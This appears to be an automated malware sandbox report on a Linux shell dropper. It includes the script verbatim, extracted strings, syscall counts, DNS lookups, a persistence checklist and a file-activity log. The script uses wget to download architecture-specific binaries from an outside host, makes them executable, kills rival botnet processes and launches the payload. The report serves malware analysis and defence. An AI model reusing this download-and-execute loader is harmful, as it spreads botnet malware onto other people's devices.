Malicious
92/100
22 points past the malicious line at 70.
Why this verdict
- MalwareBazaar known sample
- Known malicious hash (feed): malwarebazaar: n/a
- dropped_file
Analysis layers
Detection signatures
1 detected| Severity | Detection | Evidence | Layer |
|---|---|---|---|
| MED |
Dropped file
|
runtime
dropped file
observed in the guest
|
dynamic |
Structure
What the file is made of: headers, imports, how it was built and whether it was signed.
Sections & resources
How the file is laid out in memory, and what is embedded in it: section roles, access rights, entropy and every resource entry.
Signatures & packing
What matched and what is hidden: YARA rules, capa capabilities, family attribution, packer detection, unpacked payloads and recovered configuration.
Strings
The readable content: embedded secrets, flagged strings and everything extraction recovered.
Code
What the sample would execute: the emulated API call sequence, and the disassembled entry point.
Packer detection looks at a program's entry point, sections and entropy. This file is not a program image, so there was nothing of that kind to assess.
File content
21 lines · 992 bytesThe sample verbatim, shown as inert text - nothing here is interpreted by this page.
#!/bin/sh
mkdir -p /tmp/dl 2>/dev/null
wget -O /tmp/dl/main_x86_64 http://aura.tcplegit.space/main_x86_64 2>/dev/null
wget -O /tmp/dl/main_aarch64 http://aura.tcplegit.space/main_aarch64 2>/dev/null
wget -O /tmp/dl/main_mips http://aura.tcplegit.space/main_mips 2>/dev/null
wget -O /tmp/dl/main_arm http://aura.tcplegit.space/main_arm 2>/dev/null
wget -O /tmp/dl/main_powerpc http://aura.tcplegit.space/main_powerpc 2>/dev/null
wget -O /tmp/dl/main_sh4 http://aura.tcplegit.space/main_sh4 2>/dev/null
chmod 777 /tmp/dl/main_x86_64 /tmp/dl/main_aarch64 /tmp/dl/main_mips /tmp/dl/main_arm /tmp/dl/main_powerpc /tmp/dl/main_sh4 2>/dev/null
for f in /tmp/dl/main_x86_64 /tmp/dl/main_aarch64 /tmp/dl/main_mips /tmp/dl/main_arm /tmp/dl/main_powerpc /tmp/dl/main_sh4; do
if [ -s \ ]; then
killall main 2>/dev/null
killall condi 2>/dev/null
killall bot 2>/dev/null
killall httpd 2>/dev/null
killall softbot 2>/dev/null
killall kaiten 2>/dev/null
\ &
break
fi
done
Extracted strings
showing 16- wget -O /tmp/dl/main_x86_64 http://aura.tcplegit.space/main_x86_64 2>/dev/null
- wget -O /tmp/dl/main_aarch64 http://aura.tcplegit.space/main_aarch64 2>/dev/null
- wget -O /tmp/dl/main_mips http://aura.tcplegit.space/main_mips 2>/dev/null
- wget -O /tmp/dl/main_arm http://aura.tcplegit.space/main_arm 2>/dev/null
- wget -O /tmp/dl/main_powerpc http://aura.tcplegit.space/main_powerpc 2>/dev/null
- wget -O /tmp/dl/main_sh4 http://aura.tcplegit.space/main_sh4 2>/dev/null
- chmod 777 /tmp/dl/main_x86_64 /tmp/dl/main_aarch64 /tmp/dl/main_mips /tmp/dl/main_arm /tmp/dl/main_powerpc /tmp/dl/main_sh4 2>/dev/null
- for f in /tmp/dl/main_x86_64 /tmp/dl/main_aarch64 /tmp/dl/main_mips /tmp/dl/main_arm /tmp/dl/main_powerpc /tmp/dl/main_sh4; do
- killall main 2>/dev/null
- killall condi 2>/dev/null
- killall bot 2>/dev/null
- killall httpd 2>/dev/null
- killall softbot 2>/dev/null
- killall kaiten 2>/dev/null
- break
- done
No strings match this filter.
Stack and decoded strings were not recovered: this file format is not eligible for string emulation. Only literal strings present in the file are listed above.
Nothing in this view
This sample produced no results for this part of the static analysis.
VM console
headless guestThe Linux sandbox runs a server image with no desktop, so there is no screen to record - this is the boot console, kept because a kernel panic or an out-of-memory kill would show up here and in no other layer. What the sample did is under Behavior, File & registry and Network, captured from the syscall trace rather than from pixels.
Behavior summary
1 process(es) observed; 6 dropped file(s)
MITRE ATT&CK
4 techniquesSyscall summary
top calls| brk | 22 |
|---|---|
| mmap | 299 |
| chdir | 1 |
| mkdir | 2 |
| wait4 | 8 |
| access | 10 |
| execve | 1 |
| getcwd | 1 |
| munmap | 9 |
| openat | 350 |
| socket | 24 |
| statfs | 2 |
| connect | 24 |
| fchmodat | 6 |
| mprotect | 77 |
| recvfrom | 48 |
| sendmmsg | 24 |
| exit_group | 9 |
| newfstatat | 72 |
| setsockopt | 12 |
| rt_sigaction | 37 |
| rt_sigreturn | 8 |
| rt_sigprocmask | 17 |
Persistence & evasion
No persistence or evasion behavior observed.
DNS queries
2 unique| Domain | Type |
|---|---|
| aura.tcplegit.space | A |
| aura.tcplegit.space | AAAA |
Also watched
no result to show| Observer | Result | What it means |
|---|---|---|
| TCP / UDP connections | none | The guest agent recorded no socket to a remote host. |
| TLS handshakes | none | No TLS session was negotiated, so there is no JA3/JA4 fingerprint to compare. |
| Beaconing analysis | not run | The interval analysis had no traffic to work from. |
| DGA scoring | no candidate | No resolved name scored as algorithmically generated. |
| IDS ruleset | 0 alerts | The capture was replayed through the IDS ruleset and matched nothing. |
Process tree
What ran during the detonation, and what each process did. Select a node to see the activity attributed to it.
download_and_run.sh
1 processAttributed activity
Established mechanisms
cleanNo persistence established
None of the 90 auto-start methods below were established during this run.
Detection coverage
0 / 90Every auto-start method checked on this sample, grouped by family. A method with no result is reported clean.
- Active Setup Installed Component T1547.014 clean
- Explorer Delay-Load Object T1547.001 clean
- Explorer Run Key T1547.001 clean
- Explorer SharedTaskScheduler T1547.001 clean
- Group Policy Extension DLL T1547.004 clean
- Group Policy Run Key T1547.001 clean
- Logon Script T1037.001 clean
- RDP WDS Startup Program T1547.001 clean
- Registry Run Key T1547.001 clean
- Registry RunEx Key T1547.001 clean
- Registry RunOnce Key T1547.001 clean
- Registry RunOnceEx Key T1547.001 clean
- Registry RunServices Key T1547.001 clean
- Startup Folder Item T1547.001 clean
- Startup Folder Redirection T1547.001 clean
- Terminal Services Initial Program T1547.001 clean
- Winlogon GINA DLL T1547.004 clean
- Winlogon MPNotify Value T1547.004 clean
- Winlogon Notify Package T1547.004 clean
- Winlogon Shell Value T1547.004 clean
- Winlogon Taskman Value T1547.004 clean
- Winlogon Userinit Value T1547.004 clean
- BITS Job T1197 clean
- Print Monitor DLL T1547.010 clean
- Print Processor DLL T1547.012 clean
- Scheduled Task T1053.005 clean
- Scheduled Task Registry Implant T1053.005 clean
- Service Control Manager Security Descriptor T1574.011 clean
- Service DLL Hijack T1543.003 clean
- Time Provider DLL T1547.003 clean
- Windows Service Creation T1543.003 clean
- .NET Managed Debugger T1546.012 clean
- Accessibility Tool Hijack T1546.008 clean
- AeDebug Postmortem Debugger T1546.012 clean
- App Paths Hijack T1546.012 clean
- Application Shim Database T1546.011 clean
- Boot Verification Program T1547.002 clean
- Command Processor AutoRun T1546.011 clean
- Explorer Load Value T1547.001 clean
- Explorer MyComputer Tool Hijack T1546.001 clean
- Registry Image File Execution Options T1546.012 clean
- Screensaver Hijack T1546.002 clean
- Setup ErrorHandler Script T1546 clean
- Shell Open Command Hijack T1546.001 clean
- SilentProcessExit Monitor T1546.012 clean
- Telemetry Controller Command T1546.015 clean
- WER ReflectDebugger T1546.012 clean
- Windows Error Reporting Debugger T1546.012 clean
- .NET CLR Profiler DLL T1574.012 clean
- .NET Startup Hook DLL T1574 clean
- AppCert DLLs T1546.009 clean
- AppInit DLLs T1546.010 clean
- AutodialDLL Winsock Injection T1546.006 clean
- DLL Search-Order Hijack T1574.001 T1574.002 clean
- DNS Server Plugin DLL T1574.001 clean
- HTML Help Helper DLL T1546 clean
- KnownDLLs Manipulation T1574.001 clean
- Natural Language Platform DLL Override T1546 clean
- Netsh Helper DLL T1546.007 clean
- Winsock Layered Service Provider T1546.006 clean
- Browser Extension T1176 clean
- Browser Helper Object T1176 clean
- COM Server Hijack T1546.015 clean
- HTML Help COM Object Hijack T1546.015 clean
- Shell Context Menu Handler T1546.001 clean
- Shell Extension Handler T1546.001 clean
- Account RID Hijack T1098 clean
- AMSI Provider T1562.001 clean
- Credential Provider T1547.014 clean
- DSRM Admin Logon Backdoor T1556 clean
- Hidden Local Account T1136.001 clean
- LSA Authentication Package T1547.002 clean
- LSA Extension DLL T1547.005 clean
- LSA Notification Package T1547.005 clean
- LSA Security Package T1547.005 clean
- Network Provider DLL T1556.008 clean
- Security Support Provider T1547.005 clean
- Netsh Port Proxy T1090.001 clean
- Office Add-in T1137.006 clean
- Office Executable Sideload T1574.002 clean
- Office Startup Template T1137.001 clean
- Office Test Key T1137.002 clean
- Power Automate Flow T1546 clean
- PowerShell Profile T1546.013 clean
- Windows Terminal Startup Action T1546 clean
- WMI Event Subscription T1546.003 clean
- BootExecute Native Image T1547.002 clean
- PlatformExecute Native Image T1547.002 clean
- SetupExecute Native Image T1547.002 clean
- UEFI / Bootkit Artifact T1542.003 T1542.001 clean
File activity summary
Dropped files
6 payloads| Path | SHA-256 | Size | Process | Time | Download |
|---|---|---|---|---|---|
| /tmp/dl/main_x86_64 | - | - | - pid 683 | 22:10:40.388598 | - |
| /tmp/dl/main_aarch64 | - | - | - pid 684 | 22:10:40.485972 | - |
| /tmp/dl/main_mips | - | - | - pid 685 | 22:10:40.584609 | - |
| /tmp/dl/main_arm | - | - | - pid 686 | 22:10:40.682717 | - |
| /tmp/dl/main_powerpc | - | - | - pid 687 | 22:10:40.776800 | - |
| /tmp/dl/main_sh4 | - | - | - pid 688 | 22:10:40.878515 | - |
File & registry ops
300 file · 0 registry · sample scope
| Operation | Target | Process | |
|---|---|---|---|
| read |
/etc/ld.so.cache
|
- pid 681 | 22:10:40.290872 |
| read |
/lib/x86_64-linux-gnu/libc.so.6
|
- pid 681 | 22:10:40.293806 |
| read |
/var/tmp/download_and_run.sh
|
- pid 681 | 22:10:40.310613 |
| create |
/dev/null
|
- pid 681 | 22:10:40.316078 |
| read |
/etc/ld.so.cache
|
- pid 682 | 22:10:40.325329 |
| read |
/lib/x86_64-linux-gnu/libselinux.so.1
|
- pid 682 | 22:10:40.326586 |
| read |
/lib/x86_64-linux-gnu/libc.so.6
|
- pid 682 | 22:10:40.327152 |
| read |
/lib/x86_64-linux-gnu/libpcre2-8.so.0
|
- pid 682 | 22:10:40.327897 |
| read |
/proc/filesystems
|
- pid 682 | 22:10:40.329610 |
| read |
/usr/lib/locale/locale-archive
|
- pid 682 | 22:10:40.329882 |
| create |
/dev/null
|
- pid 681 | 22:10:40.332901 |
| read |
/etc/ld.so.cache
|
- pid 683 | 22:10:40.341822 |
| read |
/lib/x86_64-linux-gnu/libpcre2-8.so.0
|
- pid 683 | 22:10:40.343605 |
| read |
/lib/x86_64-linux-gnu/libuuid.so.1
|
- pid 683 | 22:10:40.347142 |
| read |
/lib/x86_64-linux-gnu/libidn2.so.0
|
- pid 683 | 22:10:40.350678 |
| read |
/lib/x86_64-linux-gnu/libssl.so.3
|
- pid 683 | 22:10:40.353407 |
| read |
/lib/x86_64-linux-gnu/libcrypto.so.3
|
- pid 683 | 22:10:40.356026 |
| read |
/lib/x86_64-linux-gnu/libz.so.1
|
- pid 683 | 22:10:40.358485 |
| read |
/lib/x86_64-linux-gnu/libpsl.so.5
|
- pid 683 | 22:10:40.361303 |
| read |
/lib/x86_64-linux-gnu/libc.so.6
|
- pid 683 | 22:10:40.365926 |
| read |
/lib/x86_64-linux-gnu/libunistring.so.5
|
- pid 683 | 22:10:40.369117 |
| read |
/usr/lib/locale/locale-archive
|
- pid 683 | 22:10:40.382951 |
| read |
/etc/wgetrc
|
- pid 683 | 22:10:40.384778 |
| create |
/tmp/dl/main_x86_64
|
- pid 683 | 22:10:40.388598 |
| read |
/etc/localtime
|
- pid 683 | 22:10:40.391571 |
| read |
/usr/share/locale/locale.alias
|
- pid 683 | 22:10:40.394276 |
| read |
/usr/share/locale/en_US.UTF-8/LC_MESSAGES/wget.mo
|
- pid 683 | 22:10:40.396109 |
| read |
/usr/share/locale/en_US.utf8/LC_MESSAGES/wget.mo
|
- pid 683 | 22:10:40.396554 |
| read |
/usr/share/locale/en_US/LC_MESSAGES/wget.mo
|
- pid 683 | 22:10:40.396915 |
| read |
/usr/share/locale/en.UTF-8/LC_MESSAGES/wget.mo
|
- pid 683 | 22:10:40.397289 |
| read |
/usr/share/locale/en.utf8/LC_MESSAGES/wget.mo
|
- pid 683 | 22:10:40.397607 |
| read |
/usr/share/locale/en/LC_MESSAGES/wget.mo
|
- pid 683 | 22:10:40.397970 |
| read |
/usr/share/locale-langpack/en_US.UTF-8/LC_MESSAGES/wget.mo
|
- pid 683 | 22:10:40.398381 |
| read |
/usr/share/locale-langpack/en_US.utf8/LC_MESSAGES/wget.mo
|
- pid 683 | 22:10:40.398756 |
| read |
/usr/share/locale-langpack/en_US/LC_MESSAGES/wget.mo
|
- pid 683 | 22:10:40.399119 |
| read |
/usr/share/locale-langpack/en.UTF-8/LC_MESSAGES/wget.mo
|
- pid 683 | 22:10:40.399553 |
| read |
/usr/share/locale-langpack/en.utf8/LC_MESSAGES/wget.mo
|
- pid 683 | 22:10:40.399912 |
| read |
/usr/share/locale-langpack/en/LC_MESSAGES/wget.mo
|
- pid 683 | 22:10:40.400282 |
| read |
/etc/nsswitch.conf
|
- pid 683 | 22:10:40.404031 |
| read |
/etc/host.conf
|
- pid 683 | 22:10:40.405632 |
| read |
/etc/resolv.conf
|
- pid 683 | 22:10:40.408199 |
| read |
/etc/hosts
|
- pid 683 | 22:10:40.410599 |
| read |
/usr/share/locale/en_US.UTF-8/LC_MESSAGES/libc.mo
|
- pid 683 | 22:10:40.432649 |
| read |
/usr/share/locale/en_US.utf8/LC_MESSAGES/libc.mo
|
- pid 683 | 22:10:40.433089 |
| read |
/usr/share/locale/en_US/LC_MESSAGES/libc.mo
|
- pid 683 | 22:10:40.433598 |
| read |
/usr/share/locale/en.UTF-8/LC_MESSAGES/libc.mo
|
- pid 683 | 22:10:40.434065 |
| read |
/usr/share/locale/en.utf8/LC_MESSAGES/libc.mo
|
- pid 683 | 22:10:40.434480 |
| read |
/usr/share/locale/en/LC_MESSAGES/libc.mo
|
- pid 683 | 22:10:40.434773 |
| read |
/usr/share/locale-langpack/en_US.UTF-8/LC_MESSAGES/libc.mo
|
- pid 683 | 22:10:40.435063 |
| read |
/usr/share/locale-langpack/en_US.utf8/LC_MESSAGES/libc.mo
|
- pid 683 | 22:10:40.435397 |
| read |
/usr/share/locale-langpack/en_US/LC_MESSAGES/libc.mo
|
- pid 683 | 22:10:40.435702 |
| read |
/usr/share/locale-langpack/en.UTF-8/LC_MESSAGES/libc.mo
|
- pid 683 | 22:10:40.435991 |
| read |
/usr/share/locale-langpack/en.utf8/LC_MESSAGES/libc.mo
|
- pid 683 | 22:10:40.436286 |
| read |
/usr/share/locale-langpack/en/LC_MESSAGES/libc.mo
|
- pid 683 | 22:10:40.436736 |
| read |
/usr/share/locale/en_US.UTF-8/LC_MESSAGES/wget-gnulib.mo
|
- pid 683 | 22:10:40.437709 |
| read |
/usr/share/locale/en_US.utf8/LC_MESSAGES/wget-gnulib.mo
|
- pid 683 | 22:10:40.438107 |
| read |
/usr/share/locale/en_US/LC_MESSAGES/wget-gnulib.mo
|
- pid 683 | 22:10:40.438563 |
| read |
/usr/share/locale/en.UTF-8/LC_MESSAGES/wget-gnulib.mo
|
- pid 683 | 22:10:40.438925 |
| read |
/usr/share/locale/en.utf8/LC_MESSAGES/wget-gnulib.mo
|
- pid 683 | 22:10:40.439491 |
| read |
/usr/share/locale/en/LC_MESSAGES/wget-gnulib.mo
|
- pid 683 | 22:10:40.439856 |
| read |
/usr/share/locale-langpack/en_US.UTF-8/LC_MESSAGES/wget-gnulib.mo
|
- pid 683 | 22:10:40.440268 |
| read |
/usr/share/locale-langpack/en_US.utf8/LC_MESSAGES/wget-gnulib.mo
|
- pid 683 | 22:10:40.440686 |
| read |
/usr/share/locale-langpack/en_US/LC_MESSAGES/wget-gnulib.mo
|
- pid 683 | 22:10:40.441054 |
| read |
/usr/share/locale-langpack/en.UTF-8/LC_MESSAGES/wget-gnulib.mo
|
- pid 683 | 22:10:40.441446 |
| read |
/usr/share/locale-langpack/en.utf8/LC_MESSAGES/wget-gnulib.mo
|
- pid 683 | 22:10:40.441806 |
| read |
/usr/share/locale-langpack/en/LC_MESSAGES/wget-gnulib.mo
|
- pid 683 | 22:10:40.442169 |
| create |
/dev/null
|
- pid 681 | 22:10:40.445985 |
| read |
/etc/ld.so.cache
|
- pid 684 | 22:10:40.450143 |
| read |
/lib/x86_64-linux-gnu/libpcre2-8.so.0
|
- pid 684 | 22:10:40.451110 |
| read |
/lib/x86_64-linux-gnu/libuuid.so.1
|
- pid 684 | 22:10:40.453200 |
| read |
/lib/x86_64-linux-gnu/libidn2.so.0
|
- pid 684 | 22:10:40.455555 |
| read |
/lib/x86_64-linux-gnu/libssl.so.3
|
- pid 684 | 22:10:40.457931 |
| read |
/lib/x86_64-linux-gnu/libcrypto.so.3
|
- pid 684 | 22:10:40.460263 |
| read |
/lib/x86_64-linux-gnu/libz.so.1
|
- pid 684 | 22:10:40.462881 |
| read |
/lib/x86_64-linux-gnu/libpsl.so.5
|
- pid 684 | 22:10:40.465369 |
| read |
/lib/x86_64-linux-gnu/libc.so.6
|
- pid 684 | 22:10:40.467447 |
| read |
/lib/x86_64-linux-gnu/libunistring.so.5
|
- pid 684 | 22:10:40.470605 |
| read |
/usr/lib/locale/locale-archive
|
- pid 684 | 22:10:40.481459 |
| read |
/etc/wgetrc
|
- pid 684 | 22:10:40.482942 |
| create |
/tmp/dl/main_aarch64
|
- pid 684 | 22:10:40.485972 |
| read |
/etc/localtime
|
- pid 684 | 22:10:40.489617 |
| read |
/usr/share/locale/locale.alias
|
- pid 684 | 22:10:40.492757 |
| read |
/usr/share/locale/en_US.UTF-8/LC_MESSAGES/wget.mo
|
- pid 684 | 22:10:40.494411 |
| read |
/usr/share/locale/en_US.utf8/LC_MESSAGES/wget.mo
|
- pid 684 | 22:10:40.494776 |
| read |
/usr/share/locale/en_US/LC_MESSAGES/wget.mo
|
- pid 684 | 22:10:40.495138 |
| read |
/usr/share/locale/en.UTF-8/LC_MESSAGES/wget.mo
|
- pid 684 | 22:10:40.495591 |
| read |
/usr/share/locale/en.utf8/LC_MESSAGES/wget.mo
|
- pid 684 | 22:10:40.495958 |
| read |
/usr/share/locale/en/LC_MESSAGES/wget.mo
|
- pid 684 | 22:10:40.496387 |
| read |
/usr/share/locale-langpack/en_US.UTF-8/LC_MESSAGES/wget.mo
|
- pid 684 | 22:10:40.496825 |
| read |
/usr/share/locale-langpack/en_US.utf8/LC_MESSAGES/wget.mo
|
- pid 684 | 22:10:40.497485 |
| read |
/usr/share/locale-langpack/en_US/LC_MESSAGES/wget.mo
|
- pid 684 | 22:10:40.497936 |
| read |
/usr/share/locale-langpack/en.UTF-8/LC_MESSAGES/wget.mo
|
- pid 684 | 22:10:40.498399 |
| read |
/usr/share/locale-langpack/en.utf8/LC_MESSAGES/wget.mo
|
- pid 684 | 22:10:40.498764 |
| read |
/usr/share/locale-langpack/en/LC_MESSAGES/wget.mo
|
- pid 684 | 22:10:40.499126 |
| read |
/etc/nsswitch.conf
|
- pid 684 | 22:10:40.502520 |
| read |
/etc/host.conf
|
- pid 684 | 22:10:40.504564 |
| read |
/etc/resolv.conf
|
- pid 684 | 22:10:40.506143 |
| read |
/etc/hosts
|
- pid 684 | 22:10:40.507769 |
| read |
/usr/share/locale/en_US.UTF-8/LC_MESSAGES/libc.mo
|
- pid 684 | 22:10:40.525948 |
| read |
/usr/share/locale/en_US.utf8/LC_MESSAGES/libc.mo
|
- pid 684 | 22:10:40.526191 |
| read |
/usr/share/locale/en_US/LC_MESSAGES/libc.mo
|
- pid 684 | 22:10:40.526428 |
| read |
/usr/share/locale/en.UTF-8/LC_MESSAGES/libc.mo
|
- pid 684 | 22:10:40.526727 |
| read |
/usr/share/locale/en.utf8/LC_MESSAGES/libc.mo
|
- pid 684 | 22:10:40.527033 |
| read |
/usr/share/locale/en/LC_MESSAGES/libc.mo
|
- pid 684 | 22:10:40.527365 |
| read |
/usr/share/locale-langpack/en_US.UTF-8/LC_MESSAGES/libc.mo
|
- pid 684 | 22:10:40.527618 |
| read |
/usr/share/locale-langpack/en_US.utf8/LC_MESSAGES/libc.mo
|
- pid 684 | 22:10:40.527854 |
| read |
/usr/share/locale-langpack/en_US/LC_MESSAGES/libc.mo
|
- pid 684 | 22:10:40.528089 |
| read |
/usr/share/locale-langpack/en.UTF-8/LC_MESSAGES/libc.mo
|
- pid 684 | 22:10:40.528363 |
| read |
/usr/share/locale-langpack/en.utf8/LC_MESSAGES/libc.mo
|
- pid 684 | 22:10:40.528619 |
| read |
/usr/share/locale-langpack/en/LC_MESSAGES/libc.mo
|
- pid 684 | 22:10:40.528866 |
| read |
/usr/share/locale/en_US.UTF-8/LC_MESSAGES/wget-gnulib.mo
|
- pid 684 | 22:10:40.529448 |
| read |
/usr/share/locale/en_US.utf8/LC_MESSAGES/wget-gnulib.mo
|
- pid 684 | 22:10:40.529810 |
| read |
/usr/share/locale/en_US/LC_MESSAGES/wget-gnulib.mo
|
- pid 684 | 22:10:40.530170 |
| read |
/usr/share/locale/en.UTF-8/LC_MESSAGES/wget-gnulib.mo
|
- pid 684 | 22:10:40.530440 |
| read |
/usr/share/locale/en.utf8/LC_MESSAGES/wget-gnulib.mo
|
- pid 684 | 22:10:40.530800 |
| read |
/usr/share/locale/en/LC_MESSAGES/wget-gnulib.mo
|
- pid 684 | 22:10:40.531158 |
| read |
/usr/share/locale-langpack/en_US.UTF-8/LC_MESSAGES/wget-gnulib.mo
|
- pid 684 | 22:10:40.531542 |
| read |
/usr/share/locale-langpack/en_US.utf8/LC_MESSAGES/wget-gnulib.mo
|
- pid 684 | 22:10:40.531901 |
| read |
/usr/share/locale-langpack/en_US/LC_MESSAGES/wget-gnulib.mo
|
- pid 684 | 22:10:40.532361 |
| read |
/usr/share/locale-langpack/en.UTF-8/LC_MESSAGES/wget-gnulib.mo
|
- pid 684 | 22:10:40.532726 |
| read |
/usr/share/locale-langpack/en.utf8/LC_MESSAGES/wget-gnulib.mo
|
- pid 684 | 22:10:40.533093 |
| read |
/usr/share/locale-langpack/en/LC_MESSAGES/wget-gnulib.mo
|
- pid 684 | 22:10:40.533403 |
| create |
/dev/null
|
- pid 681 | 22:10:40.537210 |
| read |
/etc/ld.so.cache
|
- pid 685 | 22:10:40.542145 |
| read |
/lib/x86_64-linux-gnu/libpcre2-8.so.0
|
- pid 685 | 22:10:40.543329 |
| read |
/lib/x86_64-linux-gnu/libuuid.so.1
|
- pid 685 | 22:10:40.545628 |
| read |
/lib/x86_64-linux-gnu/libidn2.so.0
|
- pid 685 | 22:10:40.548164 |
| read |
/lib/x86_64-linux-gnu/libssl.so.3
|
- pid 685 | 22:10:40.551294 |
| read |
/lib/x86_64-linux-gnu/libcrypto.so.3
|
- pid 685 | 22:10:40.554039 |
| read |
/lib/x86_64-linux-gnu/libz.so.1
|
- pid 685 | 22:10:40.557697 |
| read |
/lib/x86_64-linux-gnu/libpsl.so.5
|
- pid 685 | 22:10:40.561494 |
| read |
/lib/x86_64-linux-gnu/libc.so.6
|
- pid 685 | 22:10:40.564080 |
| read |
/lib/x86_64-linux-gnu/libunistring.so.5
|
- pid 685 | 22:10:40.567742 |
| read |
/usr/lib/locale/locale-archive
|
- pid 685 | 22:10:40.579300 |
| read |
/etc/wgetrc
|
- pid 685 | 22:10:40.581317 |
| create |
/tmp/dl/main_mips
|
- pid 685 | 22:10:40.584609 |
| read |
/etc/localtime
|
- pid 685 | 22:10:40.588496 |
| read |
/usr/share/locale/locale.alias
|
- pid 685 | 22:10:40.591517 |
| read |
/usr/share/locale/en_US.UTF-8/LC_MESSAGES/wget.mo
|
- pid 685 | 22:10:40.593169 |
| read |
/usr/share/locale/en_US.utf8/LC_MESSAGES/wget.mo
|
- pid 685 | 22:10:40.593406 |
| read |
/usr/share/locale/en_US/LC_MESSAGES/wget.mo
|
- pid 685 | 22:10:40.593822 |
| read |
/usr/share/locale/en.UTF-8/LC_MESSAGES/wget.mo
|
- pid 685 | 22:10:40.594320 |
| read |
/usr/share/locale/en.utf8/LC_MESSAGES/wget.mo
|
- pid 685 | 22:10:40.594693 |
| read |
/usr/share/locale/en/LC_MESSAGES/wget.mo
|
- pid 685 | 22:10:40.595053 |
| read |
/usr/share/locale-langpack/en_US.UTF-8/LC_MESSAGES/wget.mo
|
- pid 685 | 22:10:40.595515 |
| read |
/usr/share/locale-langpack/en_US.utf8/LC_MESSAGES/wget.mo
|
- pid 685 | 22:10:40.595874 |
| read |
/usr/share/locale-langpack/en_US/LC_MESSAGES/wget.mo
|
- pid 685 | 22:10:40.596380 |
| read |
/usr/share/locale-langpack/en.UTF-8/LC_MESSAGES/wget.mo
|
- pid 685 | 22:10:40.596753 |
| read |
/usr/share/locale-langpack/en.utf8/LC_MESSAGES/wget.mo
|
- pid 685 | 22:10:40.597146 |
| read |
/usr/share/locale-langpack/en/LC_MESSAGES/wget.mo
|
- pid 685 | 22:10:40.597589 |
| read |
/etc/nsswitch.conf
|
- pid 685 | 22:10:40.600750 |
| read |
/etc/host.conf
|
- pid 685 | 22:10:40.602342 |
| read |
/etc/resolv.conf
|
- pid 685 | 22:10:40.603823 |
| read |
/etc/hosts
|
- pid 685 | 22:10:40.605358 |
| read |
/usr/share/locale/en_US.UTF-8/LC_MESSAGES/libc.mo
|
- pid 685 | 22:10:40.624803 |
| read |
/usr/share/locale/en_US.utf8/LC_MESSAGES/libc.mo
|
- pid 685 | 22:10:40.625120 |
| read |
/usr/share/locale/en_US/LC_MESSAGES/libc.mo
|
- pid 685 | 22:10:40.625360 |
| read |
/usr/share/locale/en.UTF-8/LC_MESSAGES/libc.mo
|
- pid 685 | 22:10:40.625695 |
| read |
/usr/share/locale/en.utf8/LC_MESSAGES/libc.mo
|
- pid 685 | 22:10:40.626008 |
| read |
/usr/share/locale/en/LC_MESSAGES/libc.mo
|
- pid 685 | 22:10:40.626334 |
| read |
/usr/share/locale-langpack/en_US.UTF-8/LC_MESSAGES/libc.mo
|
- pid 685 | 22:10:40.626656 |
| read |
/usr/share/locale-langpack/en_US.utf8/LC_MESSAGES/libc.mo
|
- pid 685 | 22:10:40.626970 |
| read |
/usr/share/locale-langpack/en_US/LC_MESSAGES/libc.mo
|
- pid 685 | 22:10:40.627361 |
| read |
/usr/share/locale-langpack/en.UTF-8/LC_MESSAGES/libc.mo
|
- pid 685 | 22:10:40.627669 |
| read |
/usr/share/locale-langpack/en.utf8/LC_MESSAGES/libc.mo
|
- pid 685 | 22:10:40.628018 |
| read |
/usr/share/locale-langpack/en/LC_MESSAGES/libc.mo
|
- pid 685 | 22:10:40.628348 |
| read |
/usr/share/locale/en_US.UTF-8/LC_MESSAGES/wget-gnulib.mo
|
- pid 685 | 22:10:40.629069 |
| read |
/usr/share/locale/en_US.utf8/LC_MESSAGES/wget-gnulib.mo
|
- pid 685 | 22:10:40.629445 |
| read |
/usr/share/locale/en_US/LC_MESSAGES/wget-gnulib.mo
|
- pid 685 | 22:10:40.629812 |
| read |
/usr/share/locale/en.UTF-8/LC_MESSAGES/wget-gnulib.mo
|
- pid 685 | 22:10:40.630173 |
| read |
/usr/share/locale/en.utf8/LC_MESSAGES/wget-gnulib.mo
|
- pid 685 | 22:10:40.630508 |
| read |
/usr/share/locale/en/LC_MESSAGES/wget-gnulib.mo
|
- pid 685 | 22:10:40.630869 |
| read |
/usr/share/locale-langpack/en_US.UTF-8/LC_MESSAGES/wget-gnulib.mo
|
- pid 685 | 22:10:40.631315 |
| read |
/usr/share/locale-langpack/en_US.utf8/LC_MESSAGES/wget-gnulib.mo
|
- pid 685 | 22:10:40.631689 |
| read |
/usr/share/locale-langpack/en_US/LC_MESSAGES/wget-gnulib.mo
|
- pid 685 | 22:10:40.632050 |
| read |
/usr/share/locale-langpack/en.UTF-8/LC_MESSAGES/wget-gnulib.mo
|
- pid 685 | 22:10:40.632504 |
| read |
/usr/share/locale-langpack/en.utf8/LC_MESSAGES/wget-gnulib.mo
|
- pid 685 | 22:10:40.632869 |
| read |
/usr/share/locale-langpack/en/LC_MESSAGES/wget-gnulib.mo
|
- pid 685 | 22:10:40.633315 |
| create |
/dev/null
|
- pid 681 | 22:10:40.637078 |
| read |
/etc/ld.so.cache
|
- pid 686 | 22:10:40.641292 |
| read |
/lib/x86_64-linux-gnu/libpcre2-8.so.0
|
- pid 686 | 22:10:40.642367 |
| read |
/lib/x86_64-linux-gnu/libuuid.so.1
|
- pid 686 | 22:10:40.644785 |
| read |
/lib/x86_64-linux-gnu/libidn2.so.0
|
- pid 686 | 22:10:40.647432 |
| read |
/lib/x86_64-linux-gnu/libssl.so.3
|
- pid 686 | 22:10:40.649730 |
| read |
/lib/x86_64-linux-gnu/libcrypto.so.3
|
- pid 686 | 22:10:40.652017 |
| read |
/lib/x86_64-linux-gnu/libz.so.1
|
- pid 686 | 22:10:40.654990 |
| read |
/lib/x86_64-linux-gnu/libpsl.so.5
|
- pid 686 | 22:10:40.657733 |
| read |
/lib/x86_64-linux-gnu/libc.so.6
|
- pid 686 | 22:10:40.660299 |
| read |
/lib/x86_64-linux-gnu/libunistring.so.5
|
- pid 686 | 22:10:40.663911 |
| read |
/usr/lib/locale/locale-archive
|
- pid 686 | 22:10:40.676829 |
| read |
/etc/wgetrc
|
- pid 686 | 22:10:40.679032 |
| create |
/tmp/dl/main_arm
|
- pid 686 | 22:10:40.682717 |
| read |
/etc/localtime
|
- pid 686 | 22:10:40.686065 |
| read |
/usr/share/locale/locale.alias
|
- pid 686 | 22:10:40.689168 |
| read |
/usr/share/locale/en_US.UTF-8/LC_MESSAGES/wget.mo
|
- pid 686 | 22:10:40.690929 |
| read |
/usr/share/locale/en_US.utf8/LC_MESSAGES/wget.mo
|
- pid 686 | 22:10:40.691310 |
| read |
/usr/share/locale/en_US/LC_MESSAGES/wget.mo
|
- pid 686 | 22:10:40.691681 |
| read |
